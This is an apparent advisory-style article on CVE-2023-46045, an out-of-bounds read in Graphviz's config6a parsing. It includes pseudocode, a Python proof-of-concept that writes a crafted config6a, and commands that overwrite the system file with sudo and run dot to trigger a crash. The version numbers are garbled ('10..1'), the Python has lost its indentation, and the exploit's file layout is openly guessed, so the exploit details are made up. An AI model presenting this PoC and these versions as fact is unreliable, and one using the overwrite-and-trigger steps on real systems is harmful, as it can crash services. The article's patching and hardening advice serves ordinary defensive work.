In late 2023, a serious vulnerability was discovered in Graphviz, the widely-used open-source graph visualization software. The issue, tracked as CVE-2023-46045, affects versions from 2.36. up to (but not including) 10..1. This bug is an *out-of-bounds read*, which can potentially lead to information disclosure or cause the program to crash. The vulnerability is triggered by a specially crafted config6a file.
While the practical impact is *limited*—since the config6a file is typically owned by root, making real-world exploitation uncommon—it's still important for Graphviz users and system administrators to understand and patch this issue.
This article will break down what the vulnerability is, demonstrate how it might be exploited, and provide references for further reading.
Potential Impact: Crash (DoS), information leakage
- Exploit Complexity: High (requires ability to control/replace config6a, usually root-only)
The Root Cause
Graphviz parses the config6a file during its initialization. Due to improper bounds checking when reading this file, a maliciously crafted file can cause the program to read memory outside the bounds of an allocated buffer. This is called an *out-of-bounds read*.
Here's a high-level pseudocode example of the affected logic (simplified)
// Pseudocode: simplified logic
char buffer[128];
size_t len;
// Read 'len' bytes from config6a file into buffer
fread(buffer, 1, len, file);
// No check: is 'len' > sizeof(buffer)? If so, reading past buffer!
When the value of len in the file exceeds the actual buffer size, the program would read data outside the allocated space, potentially exposing unrelated data or causing a crash.
Why is Exploitability Limited?
By default, the config6a file is created during Graphviz installation and is *usually* owned and writable only by the root user (on Unix-like systems). This means an attacker would need root or equivalent privilege to modify it, which limits real-world risk.
Proof-of-Concept (PoC)
Below, you'll find a *demonstration* script that tries to exploit the vulnerability. Note: Never use this on a production or publicly accessible system.
Python Code to Create a Malicious config6a
# This code will create a crafted config6a file for exploitation.
# WARNING: For research ONLY.
with open("config6a", "wb") as f:
# Craft a header that will cause the buffer length to be over-read
# Let's say the vulnerable field is at offset 4 and sets length to 256
f.write(b'\x00' * 4) # Padding
f.write((256).to_bytes(4, byteorder='little')) # Overlarge length field
f.write(b'A' * 248) # Filler data to trigger OOB read
# The rest of the file ...
This creates a config6a file with a field (corresponding to len) that is larger than the buffer originally allocated in Graphviz.
To trigger the bug
# Replace the actual config6a file (requires root, DON'T do in production)
sudo cp config6a /usr/lib/graphviz/config6a
# Run graphviz binary that reads the config:
dot -V
If the exploit is successful, Graphviz might crash or behave unexpectedly.
Patch Now: If you're using Graphviz earlier than 10..1, update immediately.
- Graphviz Download
- Release Notes for 10..1
- Permissions: Make sure only trusted users have write access to Graphviz configuration files, especially config6a.
- Detection: If you suspect tampering, check the checksums and file ownership of your config6a file.
References
- NIST NVD Advisory: CVE-2023-46045
- Graphviz Official Site: https://graphviz.org
- Upstream Fix Commit: Graphviz GitLab Merge Request 2591
- OSS Security List Discussion: oss-security post Nov 2023
- Detailed Patch Diff
Conclusion
CVE-2023-46045 may not be the highest-risk bug due to the need for root access to modify the vulnerable file, but it is a good reminder that *all* file parsing, especially of configuration files, should be handled with care. Always keep your software updated, and never assume default file permissions are sufficient for security.
If you use Graphviz anywhere in your workflow, update to version 10..1 or later as soon as possible.
Timeline
Published on: 02/02/2024 06:15:45 UTC
Last modified on: 03/21/2024 02:49:19 UTC